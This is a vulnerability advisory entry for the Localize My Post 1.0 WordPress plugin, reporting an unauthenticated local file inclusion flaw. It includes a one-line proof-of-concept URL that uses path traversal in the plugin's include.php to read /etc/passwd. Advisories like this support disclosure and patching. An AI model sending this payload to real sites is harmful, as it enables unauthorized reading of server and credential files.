Localize My Post 1.0 - Unauthenticated Local File Inclusion (LFI)

2018-09-19T00:00:00
ID WPVDB-ID:B84237D0-A58C-48CC-BBD0-32A2D575536C
Type wpvulndb
Reporter Ryan Dewhurst
Modified 2020-09-22T07:25:52

Description

The localize-my-post WordPress plugin was affected by an Unauthenticated Local File Inclusion (LFI) security vulnerability.

PoC

http://www.example.com/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd